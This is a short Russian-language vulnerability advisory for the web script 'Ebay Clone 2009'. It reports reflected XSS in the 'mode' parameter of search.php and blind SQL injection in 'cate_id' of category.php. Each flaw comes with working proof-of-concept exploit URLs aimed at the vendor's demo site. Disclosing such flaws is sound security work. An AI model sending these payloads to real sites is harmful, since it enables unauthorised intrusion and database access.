Программа: Ebay Clone 2009

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему и произвольные команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "mode" сценарием search.php. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

http://www.site.com/patch/search.php?mode=[XSS]

http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "cate_id" сценарием category.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]

http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5



Оставить мнение